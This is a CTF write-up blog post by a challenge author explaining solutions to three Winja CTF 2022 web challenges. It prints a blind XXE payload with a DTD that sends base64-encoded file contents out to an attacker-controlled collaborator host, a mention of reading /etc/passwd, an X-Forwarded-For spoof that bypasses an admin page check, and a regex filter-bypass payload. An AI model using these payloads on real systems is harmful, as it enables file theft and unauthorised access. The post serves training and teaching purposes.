{"id":966,"date":"2022-09-12T16:00:33","date_gmt":"2022-09-12T16:00:33","guid":{"rendered":"https:\/\/shreyapohekar.com\/blogs\/?p=966"},"modified":"2022-09-14T19:24:24","modified_gmt":"2022-09-14T19:24:24","slug":"winja-ctf-web-challenges-solutions-nullcon-goa-2022","status":"publish","type":"post","link":"https:\/\/shreyapohekar.com\/blogs\/winja-ctf-web-challenges-solutions-nullcon-goa-2022\/","title":{"rendered":"Winja CTF &#8211; Web Challenges Solutions &#8211; Nullcon Goa 2022"},"content":{"rendered":"\n<p>Hey Fellas. It was a blast this year at Nullcon. And I had a great time exploring and creating web challenges. If you haven&#8217;t checked out the solutions to the OSINT challenges, you can find them <a href=\"https:\/\/shreyapohekar.com\/blogs\/winja-ctf-nullcon-goa-2022-osint-challenges-writeup\/\" target=\"_blank\" rel=\"noreferrer noopener\">here<\/a>.<\/p>\n\n\n\n<p>Let&#8217;s walk through all the web challenges I created.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Webb Space<\/h2>\n\n\n\n<h3 class=\"wp-block-heading\">Challenge description<\/h3>\n\n\n\n<p>We wonder. It\u2019s our nature. How did we get here?<br>Are we alone in the universe?<br>How does the universe work?<br>\u200b<br>The James Webb Space Telescope is an ambitious scientific endeavour to answer these questions. Webb builds on the legacy of previous space-based telescopes to push the boundaries of human knowledge even further, to the formation of the first galaxies and the horizons of other worlds.<br>\u200b<br>To answer all your queries, we have created a contact form and an expert from NASA will be answering each one of them. 
So, shoot your questions.<br>\u200b<br>https:\/\/webbspace.chall.winja.site<\/p>\n\n\n\n<h3 class=\"wp-block-heading\">Solution<\/h3>\n\n\n\n<p>The link directs us to a contact form where hitting submit does NOTHING!!<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"444\" height=\"573\" src=\"https:\/\/shreyapohekar.com\/blogs\/wp-content\/uploads\/2022\/08\/image-4.png\" alt=\"\" class=\"wp-image-974\" srcset=\"https:\/\/shreyapohekar.com\/blogs\/wp-content\/uploads\/2022\/08\/image-4.png 444w, https:\/\/shreyapohekar.com\/blogs\/wp-content\/uploads\/2022\/08\/image-4-232x300.png 232w\" sizes=\"(max-width: 444px) 100vw, 444px\" \/><\/figure>\n\n\n\n<p>However, if you capture this request in Burp, the response says that your request has been submitted and you will hear from us soon!<\/p>\n\n\n\n<p>For this challenge, the important part is the <code>XML<\/code> format of the submitted data, which points straight to XXE attacks.<\/p>\n\n\n\n<p>But here&#8217;s a catch! It&#8217;s not a basic XXE, so a basic XXE payload won&#8217;t work here, as no result or errors are displayed. This challenge is based on blind XXE, where data has to be retrieved via an external server. Read more about blind XXE [<a href=\"https:\/\/shreyapohekar.com\/blogs\/blind-xxe-attacks-out-of-band-interaction-techniques-oast-to-exfilterate-data\/\" target=\"_blank\" rel=\"noreferrer noopener\">here<\/a>].<\/p>\n\n\n\n<h3 class=\"wp-block-heading\">Steps<\/h3>\n\n\n\n<ul class=\"wp-block-list\"><li>Host a malicious DTD containing the URL of your Burp Collaborator client. An alternative can be <code>ngrok<\/code>. 
You can host this DTD on your own server or simply on pastebin.com.<\/li><\/ul>\n\n\n\n<pre class=\"wp-block-preformatted wpf-blue-background\">&lt;!ENTITY % all \"&lt;!ENTITY &amp;#x25; req SYSTEM 'https:\/\/lujs5f02qzedctukwbjkyems4ja9yy.burpcollaborator.net\/%file;'&gt;\"&gt;<\/pre>\n\n\n\n<ul class=\"wp-block-list\"><li>Now make the following request and hit send. The response will still look the same. However, you will receive an outbound connection on your Burp Collaborator client.<\/li><li>If you are wondering why <code>shaun<\/code> is used, there is a hint given in https:\/\/webbspace.chall.winja.site\/humans.txt that discloses an email, i.e. <code>shaun@winja.net<\/code>. Alternatively, you can first retrieve the contents of \/etc\/passwd, which will leak the username <code>shaun<\/code>.<\/li><\/ul>\n\n\n\n<pre class=\"wp-block-preformatted wpf-blue-background\">&lt;!DOCTYPE foo [\n&lt;!ENTITY % file SYSTEM \"php:\/\/filter\/convert.base64-encode\/resource=\/home\/shaun\/flag.txt\"&gt;\n&lt;!ENTITY % dtd SYSTEM \"http:\/\/attacker.com\/xxe.dtd\"&gt;\n&lt;!-- load the external DTD file --&gt;\n%dtd;\n&lt;!-- resolve the nested parameter entity declared in that DTD --&gt;\n%all;\n&lt;!-- resolve the external entity req, whose URL carries the base64-encoded file --&gt;\n%req;\n]&gt;<\/pre>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"345\" src=\"https:\/\/shreyapohekar.com\/blogs\/wp-content\/uploads\/2022\/08\/webbspace-payload-1024x345.png\" alt=\"\" class=\"wp-image-969\" srcset=\"https:\/\/shreyapohekar.com\/blogs\/wp-content\/uploads\/2022\/08\/webbspace-payload-1024x345.png 1024w, https:\/\/shreyapohekar.com\/blogs\/wp-content\/uploads\/2022\/08\/webbspace-payload-300x101.png 300w, https:\/\/shreyapohekar.com\/blogs\/wp-content\/uploads\/2022\/08\/webbspace-payload-768x259.png 768w, https:\/\/shreyapohekar.com\/blogs\/wp-content\/uploads\/2022\/08\/webbspace-payload-640x216.png 640w, 
https:\/\/shreyapohekar.com\/blogs\/wp-content\/uploads\/2022\/08\/webbspace-payload.png 1346w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<ul class=\"wp-block-list\"><li>Look for the interaction of type HTTP in Collaborator; its request will contain a base64 string. Decode it to get the flag.<\/li><\/ul>\n\n\n\n<figure class=\"wp-block-image size-full is-resized\"><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/shreyapohekar.com\/blogs\/wp-content\/uploads\/2022\/08\/webbspace-collaborator-client.png\" alt=\"\" class=\"wp-image-968\" width=\"840\" height=\"404\" srcset=\"https:\/\/shreyapohekar.com\/blogs\/wp-content\/uploads\/2022\/08\/webbspace-collaborator-client.png 882w, https:\/\/shreyapohekar.com\/blogs\/wp-content\/uploads\/2022\/08\/webbspace-collaborator-client-300x145.png 300w, https:\/\/shreyapohekar.com\/blogs\/wp-content\/uploads\/2022\/08\/webbspace-collaborator-client-768x370.png 768w, https:\/\/shreyapohekar.com\/blogs\/wp-content\/uploads\/2022\/08\/webbspace-collaborator-client-640x308.png 640w\" sizes=\"(max-width: 840px) 100vw, 840px\" \/><\/figure>\n\n\n\n<h2 class=\"wp-block-heading\">Project Artemis<\/h2>\n\n\n\n<h3 class=\"wp-block-heading\">Challenge description<\/h3>\n\n\n\n<p>NASA&#8217;s ambitious &#8216;Moon to Mars&#8217; plan involves building a new space station in lunar orbit and, eventually, a habitable Moon base. But not all the details around the project are disclosed. Can you access the secret information?<\/p>\n\n\n\n<p><a href=\"https:\/\/project-artemis.chall.winja.site\/\">https:\/\/project-artemis.chall.winja.site\/<\/a><\/p>\n\n\n\n<h3 class=\"wp-block-heading\">Solution<\/h3>\n\n\n\n<p>Once you visit the challenge link, you will see at the bottom that it is created by NASA Admin. This hints at the page <code>admin.php<\/code>, which shows the message &#8220;You are not allowed to access this file.&#8221;<\/p>\n\n\n\n<p>Capture this request in Burp and start Param Miner [Right Click -&gt; Guess headers]. 
Param Miner will identify that <code>X-Forwarded-For<\/code> is honoured by this host.<\/p>\n\n\n\n<p>Make the following request to get the flag&#8230;<\/p>\n\n\n\n<pre class=\"wp-block-preformatted wpf-blue-background\">GET \/admin.php HTTP\/1.1\nHost: project-artemis.chall.winja.site\nX-Forwarded-For: 127.0.0.2\nConnection: close\nCache-Control: max-age=0\nsec-ch-ua: \"Chromium\";v=\"104\", \" Not A;Brand\";v=\"99\", \"Google Chrome\";v=\"104\"\nsec-ch-ua-mobile: ?0\nsec-ch-ua-platform: \"Windows\"\nUpgrade-Insecure-Requests: 1\nUser-Agent: Mozilla\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\/537.36 (KHTML, like Gecko) Chrome\/104.0.0.0 Safari\/537.36\nAccept: text\/html,application\/xhtml+xml,application\/xml;q=0.9,image\/avif,image\/webp,image\/apng,*\/*;q=0.8,application\/signed-exchange;v=b3;q=0.9\nSec-Fetch-Site: none\nSec-Fetch-Mode: navigate\nSec-Fetch-User: ?1\nSec-Fetch-Dest: document\nAccept-Language: en-US,en;q=0.9\n<\/pre>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"324\" src=\"https:\/\/shreyapohekar.com\/blogs\/wp-content\/uploads\/2022\/08\/image-1024x324.png\" alt=\"\" class=\"wp-image-967\" srcset=\"https:\/\/shreyapohekar.com\/blogs\/wp-content\/uploads\/2022\/08\/image-1024x324.png 1024w, https:\/\/shreyapohekar.com\/blogs\/wp-content\/uploads\/2022\/08\/image-300x95.png 300w, https:\/\/shreyapohekar.com\/blogs\/wp-content\/uploads\/2022\/08\/image-768x243.png 768w, https:\/\/shreyapohekar.com\/blogs\/wp-content\/uploads\/2022\/08\/image-640x203.png 640w, https:\/\/shreyapohekar.com\/blogs\/wp-content\/uploads\/2022\/08\/image.png 1311w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>Something to note here is that only 127.0.0.2 is accepted, since it too is a loopback address that refers to the local machine.<\/p>\n\n\n\n<p>I didn&#8217;t expect it would have so few solves. 
Kudos to the ones who were able to get through!<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Key to Mars<\/h2>\n\n\n\n<h3 class=\"wp-block-heading\">Challenge Description<\/h3>\n\n\n\n<p>The Curiosity rover spacecraft launcher is protected by a key to avoid any unauthorised launch. Even though the key is complex, it is still possible to crack it. Can you activate the launcher?<\/p>\n\n\n\n<p><a href=\"https:\/\/keytomars.chall.winja.site\" target=\"_blank\" rel=\"noreferrer noopener\">https:\/\/keytomars.chall.winja.site<\/a><\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"750\" height=\"385\" src=\"https:\/\/shreyapohekar.com\/blogs\/wp-content\/uploads\/2022\/08\/image-3.png\" alt=\"\" class=\"wp-image-972\" srcset=\"https:\/\/shreyapohekar.com\/blogs\/wp-content\/uploads\/2022\/08\/image-3.png 750w, https:\/\/shreyapohekar.com\/blogs\/wp-content\/uploads\/2022\/08\/image-3-300x154.png 300w, https:\/\/shreyapohekar.com\/blogs\/wp-content\/uploads\/2022\/08\/image-3-640x329.png 640w\" sizes=\"(max-width: 750px) 100vw, 750px\" \/><\/figure>\n\n\n\n<h3 class=\"wp-block-heading\">Solution<\/h3>\n\n\n\n<p>&#8220;The key is complex but can still be cracked&#8221; is a hint that points to <strong>regex<\/strong>!!!<\/p>\n\n\n\n<p>There was another hint given in <code>hint.txt<\/code>! Great work if you found it \ud83d\ude42<\/p>\n\n\n\n<p>Moving forward to the solution.<\/p>\n\n\n\n<p>Now that you know the challenge is all about regex, let&#8217;s dive in.<\/p>\n\n\n\n<p>Typing any random character in the input field gives you a delay of 3 seconds before it echoes <strong>Incorrect<\/strong>. However, if you type a string like <code>flag<\/code>, it will say found, which simply means that you found a substring of the key!<\/p>\n\n\n\n<p>The interesting part here is that characters like <code>. + *<\/code> are blocked. 
So you won&#8217;t be able to get the flag via a simple regex payload.<\/p>\n\n\n\n<p><strong>Possible payload<\/strong>: <code>[\\s \\W \\w \\S]{0,}<\/code><\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img loading=\"lazy\" decoding=\"async\" width=\"687\" height=\"84\" src=\"https:\/\/shreyapohekar.com\/blogs\/wp-content\/uploads\/2022\/08\/image-1.png\" alt=\"\" class=\"wp-image-970\" srcset=\"https:\/\/shreyapohekar.com\/blogs\/wp-content\/uploads\/2022\/08\/image-1.png 687w, https:\/\/shreyapohekar.com\/blogs\/wp-content\/uploads\/2022\/08\/image-1-300x37.png 300w, https:\/\/shreyapohekar.com\/blogs\/wp-content\/uploads\/2022\/08\/image-1-640x78.png 640w\" sizes=\"(max-width: 687px) 100vw, 687px\" \/><\/figure>\n\n\n\n<p>Let me know in the comments which payload you used to get the flag!!<\/p>\n\n\n\n<p>Thank you for participating in Winja CTF. I hope you enjoyed solving it. We are always open to adding more people to the team who are really interested and willing to contribute to the Winja CTF challenges. Feel free to reach out if you are interested and want to learn and grow with us. <a href=\"https:\/\/t.co\/YPWAn3dykf\">Winja CTF discord<\/a> would be the best place to reach out.<\/p>\n\n\n\n<p>That&#8217;s all for this blog post!<\/p>\n\n\n\n<p>I hope you enjoyed solving Winja CTF!<\/p>\n\n\n\n<p>See you in the next one. Until then, happy hunting! 
\ud83d\ude42<\/p>\n","protected":false},"excerpt":{"rendered":"<p>This post contains the web challenges created by me in winja ctf 2022.<\/p>\n","protected":false},"author":1,"featured_media":992,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","categories":[280,2],"tags":[296,370,369,285,281]}